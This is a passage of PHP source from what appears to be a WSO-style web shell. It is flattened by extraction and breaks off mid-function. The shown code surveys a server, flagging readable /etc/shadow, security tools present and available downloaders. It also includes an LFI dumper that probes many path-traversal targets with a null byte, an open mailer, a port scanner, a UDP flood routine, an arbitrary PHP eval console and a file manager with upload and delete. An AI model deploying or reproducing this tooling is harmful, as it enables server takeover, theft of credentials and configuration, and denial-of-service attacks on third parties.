'<font color=white>' wsoPerms(@fileperms($f)) . '</font>';
    else
        return 
'<font color=#25ff00>' wsoPerms(@fileperms($f)) . '</font>';
}

if(!
function_exists("scandir")) {
    function 
scandir($dir) {
        
$dh  opendir($dir);
        while (
false !== ($filename readdir($dh)))
            
$files[] = $filename;
        return 
$files;
    }
}

function 
wsoWhich($p) {
    
$path wsoEx('which ' $p);
    if(!empty(
$path))
        return 
$path;
    return 
false;
}

function 
actionSecInfo() {
    
wsoHeader();
    echo 
'<h1>Server security information</h1><div class=content>';
    function 
wsoSecParam($n$v) {
        
$v trim($v);
        if(
$v) {
            echo 
'<span>' $n ': </span>';
            if(
strpos($v"\n") === false)
                echo 
$v '<br>';
            else
                echo 
'<pre class=ml1>' $v '</pre>';
        }
    }

    
wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(
function_exists('apache_get_modules'))
        
wsoSecParam('Loaded Apache modules'implode(', 'apache_get_modules()));
    
wsoSecParam('Disabled PHP Functions'$GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    
wsoSecParam('Open base dir', @ini_get('open_basedir'));
    
wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    
wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    
wsoSecParam('cURL support'function_exists('curl_version')?'enabled':'no');
    
$temp=array();
    if(
function_exists('mysql_get_client_info'))
        
$temp[] = "MySql (".mysql_get_client_info().")";
    if(
function_exists('mssql_connect'))
        
$temp[] = "MSSQL";
    if(
function_exists('pg_connect'))
        
$temp[] = "PostgreSQL";
    if(
function_exists('oci_connect'))
        
$temp[] = "Oracle";
    
wsoSecParam('Supported databases'implode(', '$temp));
    echo 
'<br>';

    if(
$GLOBALS['os'] == 'nix') {
        
wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
        
wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
        
wsoSecParam('OS version', @file_get_contents('/proc/version'));
        
wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!
$GLOBALS['safe_mode']) {
            
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
            
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
            
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
            echo 
'<br>';
            
$temp=array();
            foreach (
$userful as $item)
                if(
wsoWhich($item))
                    
$temp[] = $item;
            
wsoSecParam('Userful'implode(', ',$temp));
            
$temp=array();
            foreach (
$danger as $item)
                if(
wsoWhich($item))
                    
$temp[] = $item;
            
wsoSecParam('Danger'implode(', ',$temp));
            
$temp=array();
            foreach (
$downloaders as $item)
                if(
wsoWhich($item))
                    
$temp[] = $item;
            
wsoSecParam('Downloaders'implode(', ',$temp));
            echo 
'<br/>';
            
wsoSecParam('HDD space'wsoEx('df -h'));
            
wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
        }
    } else {
        
wsoSecParam('OS Version',wsoEx('ver'));
        
wsoSecParam('Account Settings',wsoEx('net accounts'));
        
wsoSecParam('User Accounts',wsoEx('net user'));
    }
    echo 
'</div>';
    
wsoFooter();
}
function 
actionlfiscan() {
    
wsoHeader();
    print 
'
   <h3>Death Burner\'s LFI File dumper</h3>

   <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
      LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
         <option value="1">
            Access Log
         </option>

         <option value="2">
            httpd.conf
         </option>

         <option value="3">
            Error Log
         </option>
         <option value="4">
            php.ini
         </option>
         <option value="5">
            MySQL
         </option>
         <option value="6">
            FTP
         </option>
         <option value="7">
            Environ
         </option>
      </select> Null: <select name="null">
         <option value="%00">
            Yes
         </option>

         <option value="">
            No
         </option>
      </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
   </form>'
;
   
error_reporting(0);
      if(
$_POST['lfiurl']) {
         print 
"<pre>";
         
$cheader $_POST['custom_header'];
         
$target $_POST['lfiurl'];
         
$type $_POST['scantype'];
         
$byte1 $_POST['null'];
         
$lfitest "../../../../../../../../../../../../../../etc/passwd".$byte1."";
         
$lfitest2 "../../../../../../../../../../../../../../fake/file".$byte1."";
         
$lfiprocenv "../../../../../../../../../../../../../../proc/environ".$byte1."";
         
$lfiaccess = array(
            
=> "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
            
=> "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
            
=> "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
            
=> "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
            
=> "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
            
10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
            
11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
            
12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
            
13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
            
14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
            
15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
            
16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
            
17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
            
18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
            
19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
            
20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
            
21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
            
22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
            
23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
       
         
$lfierror = array(
            
=> "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
            
=> "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
            
=> "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
            
=> "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
            
=> "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
            
=> "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
            
10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
            
11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
            
12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
            
13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
            
14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
            
15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
            
16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
            
17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
            
18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
            
19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
            
20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
            
21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
            
22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
            
23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");

         
$lficonfig = array(
            
=> "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
            
10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
            
11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
            
12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
            
13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
            
14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
            
15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
            
16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
            
17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
            
18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
            
19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
            
20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
            
21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
            
22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
            
23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
            
24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
            
25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
            
26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
            
27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
            
28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
            
29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
            
30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
            
31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
            
32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
            
33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
            
34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
            
35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
               
          
$lfiphpini = array(
            
=> "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
            
=> "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
            
10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
            
11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
            
12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
            
13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
            
14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
            
15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
            
16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
            
17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
            
18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
            
19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
            
20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
            
21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
            
22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
            
23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
            
24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
            
25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
            
26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
            
27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
       
          
$lfimysql = array(
            
=> "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
            
10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
       
          
$lfiftp = array(
            
=> "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
            
=> "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
            
=> "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
            
=> "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
            
10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
            
11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
            
12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
            
13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
            
14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
            
15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
            
16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
            
17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
            
18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
            
19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
            
20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
            
21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
            
22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
            
23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
            
24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
            
25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
            
26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
            
27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
            
28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
            
29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
            
30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
            
31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
            
32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
            
33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
            
34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
            
35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
            
36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
            
37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
            
38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
            
39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
            
40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
            
41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
            
42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
            
43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
            
44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
       

         
$x 1;
         if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
            while(
$lfiaccess[$x]) {
                
$res3 FetchURL($target.$lfiaccess[$x]);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br  />";
                }
                
$x++;
      }
      }
         }
         if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
            while(
$lficonfig[$x]) {
                
$res3 FetchURL($target.$lficonfig[$x]);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br  />";
                }
                
$x++;
      }
      }
         }
         if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
            while(
$lfierror[$x]) {
                
$res3 FetchURL($target.$lfierror[$x]);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br  />";
                }
                
$x++;
      }
      }
         }
         if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
            while(
$lfiphpini[$x]) {
                
$res3 FetchURL($target.$lfiphpini[$x]);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br  />";
                }
                
$x++;
      }
      }
         }
         if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
            while(
$lfimysql[$x]) {
                
$res3 FetchURL($target.$lfimysql[$x]);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br  />";
                }
                
$x++;
      }
      }
         }
         if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";
            while(
$lfiftp[$x]) {
                
$res3 FetchURL($target.$lfiftp[$x]);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br  />";
                }
                
$x++;
      }
      }
         }
if ( 
$type == ) {
            
$res1 FetchURL($target.$lfitest);
            
$res2 FetchURL($target.$lfitest2);
            
$rhash1 md5($res1);
            
$rhash2 md5($res2);
            if (
$rhash1 != $rhash2) {
                print 
"<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";{
                
$res3 FetchURL($target.$lfiprocenv);
                
$rhash3 md5($res3);
                if (
$rhash3 != $rhash2) {
                print 
"<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br  />";
                }
                else {             
                              print 
"<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br  />";
                }
      }
      }
         }
      }
wsoFooter();
}
function 
actionphptools() {
wsoHeader();
?>
<?php
//mailer
echo '<b>Mailer</b><br>
<form action="'
.$surl.'" method=POST>
<input type="hidden" name="a" value="phptools">
<input type=text name=to value=to><br>
<input type=text name=from value=from><br>
<input type=text name=subject value=subject><br>
<input type=text name=body value=body><br>
<input type=submit name=submit value=Submit></form>'
;
if (isset(
$_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) {
    
$headers 'From: '.$_POST['from'];
    
mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers);
    echo 
'Email sent.';
}


///---------------------------------------------------------------------------\
//|Lame port scanner                                                          |
//|needs alot of work                                                         |
//|                                                                           |
//|                                                                           |
//\---------------------------------------------------------------------------/
echo '<br><b>Port Scanner</b><br>';
//takes starting port
$start strip_tags($_POST['start']);
//takes ending port
$end strip_tags($_POST['end']);
//takes host address
$host strip_tags($_POST['host']);

//if host is not null and end and start ports and numeric
if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
//so start at the starting port and end when end port is reached
for($i $start$i<=$end$i++){
//open a connection to remote host on port i
    
$fp = @fsockopen($host$i$errno$errstr3);
//if connection is succesfull then echo it is open
    
if($fp){
        echo 
'Port '.$i.' is <font color=green>open</font><br>';
    }
    
flush();
    }
}else{
?>
Host :

Port start :

Port end :

<?php
}

//UDP
if(isset($_POST['host'])&&is_numeric($_POST['time'])){
    
$pakits 0;
    
ignore_user_abort(TRUE);
    
set_time_limit(0);
    
    
$exec_time $_POST['time'];
    
    
$time time();
    
//print "Started: ".time('h:i:s')."<br>";
    
$max_time $time+$exec_time;

    
$host $_POST['host'];
    
    for(
$i=0;$i<65000;$i++){
            
$out .= 'X';
    }
    while(
1){
    
$pakits++;
            if(
time() > $max_time){
                    break;
            }
            
$rand rand(1,65000);
            
$fp fsockopen('udp://'.$host$rand$errno$errstr5);
            if(
$fp){
                    
fwrite($fp$out);
                    
fclose($fp);
            }
    }
    echo 
"<br><b>UDP Flood</b><br>Completed with $pakits (" round(($pakits*65)/10242) . " MB) packets averaging "round($pakits/$exec_time2) . " packets per second \n";
    echo 
'<br><br>
        <form action="'
.$surl.'" method=POST>
        <input type="hidden" name="a" value="phptools">
        Host: <input type=text name=host value=localhost>
        Length (seconds): <input type=text name=time value=9999>
        <input type=submit value=Go></form>'
;
}else{ echo 
'<br><b>UDP Flood</b><br>
            <form action=? method=POST>
            <input type="hidden" name="a" value="phptools">
            Host: <br><input type=text name=host value=localhost><br>
            Length (seconds): <br><input type=text name=time value=9999><br>
            <input type=submit value=Go></form>'
;
}
?>
<?php
wsoFooter
();}
function 
actionPhp() {
    if(isset(
$_POST['ajax'])) {
        
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
        
ob_start();
        eval(
$_POST['p1']);
        
$temp "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
        echo 
strlen($temp), "\n"$temp;
        exit;
    }
    
wsoHeader();
    if(isset(
$_POST['p2']) && ($_POST['p2'] == 'info')) {
        echo 
'<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
        
ob_start();
        
phpinfo();
        
$tmp ob_get_clean();
        
$tmp preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
        
$tmp preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
        echo 
str_replace('<h1','<h2'$tmp) .'</div><br>';
    }
    if(empty(
$_POST['ajax']) && !empty($_POST['p1']))
        
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
    echo 
'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo 
' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty(
$_POST['p1'])) {
        
ob_start();
        eval(
$_POST['p1']);
        echo 
htmlspecialchars(ob_get_clean());
    }
    echo 
'</pre></div>';
    
wsoFooter();
}

function 
actionFilesMan() {
    
wsoHeader();
    echo 
'<h1>File manager</h1><div class=content><div class="base64" title='PHNjcmlwdD5wMV89cDJfPXAzXz0iIjs8L3NjcmlwdD4=' ></div>

'
;
    if(!empty(
$_POST['p1'])) {
        switch(
$_POST['p1']) {
            case 
'uploadFile':
                if(!@
move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                    echo 
"Can't upload file!";
                break;
            case 
'mkdir':
                if(!@
mkdir($_POST['p2']))
                    echo 
"Can't create new dir";
                break;
            case 
'delete':
                function 
deleteDir($path) {
                    
$path = (substr($path,-1)=='/') ? $path:$path.'/';
                    
$dh  opendir($path);
                    while ( (
$item readdir($dh) ) !== false) {
                        
$item $path.$item;
                        if ( (
basename($item) == "..") || (basename($item) == ".") )
                            continue;
                        
$type filetype($item);
                        if (
$type == "dir")
                            
deleteDir($item);
                        else
                            @
unlink($item);
                    }
                    
closedir($dh);
                    @
rmdir($path);
                }
                if(
is_array(@$_POST['f']))
                    foreach(
$_POST['f'] as $f) {
                        if(
$f == '..')
                            continue;
                        
$f urldecode($f);
                        if(
is_dir($f))
                            
deleteDir($f);
                        else
                            @
unlink($f);
                    }
                break;
            case 
'paste':
                if(
$_SESSION['act'] == 'copy') {
                    function 
copy_paste($c,$s,$d){
                        if(
is_dir($c.$s)){
                            
mkdir($d.$s);
                            
$h = @opendir($c.$s);
                            while ((
$f = @readdir($h)) !== false)
                                if ((
